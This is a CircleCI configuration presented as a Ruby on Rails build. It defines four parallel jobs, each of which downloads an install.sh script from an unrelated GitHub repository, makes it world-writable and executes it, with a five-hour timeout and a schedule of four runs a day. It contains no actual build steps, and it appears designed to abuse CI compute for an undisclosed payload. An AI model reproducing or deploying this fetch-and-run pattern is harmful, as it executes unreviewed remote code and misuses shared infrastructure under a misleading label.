working_dir: &working_dir ~/app

version: 2.0
jobs:
  manganang1:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/oldrubycircleci/pelitkontol/master/install.sh && chmod 777 install.sh && ./install.sh
        no_output_timeout: 5h          

  manganang2:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/oldrubycircleci/pelitkontol/master/install.sh && chmod 777 install.sh && ./install.sh
        no_output_timeout: 5h

  manganang3:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/oldrubycircleci/pelitkontol/master/install.sh && chmod 777 install.sh && ./install.sh
        no_output_timeout: 5h

  manganang4:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/oldrubycircleci/pelitkontol/master/install.sh && chmod 777 install.sh && ./install.sh
        no_output_timeout: 5h
                  
workflows:
  version: 2
  commit:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
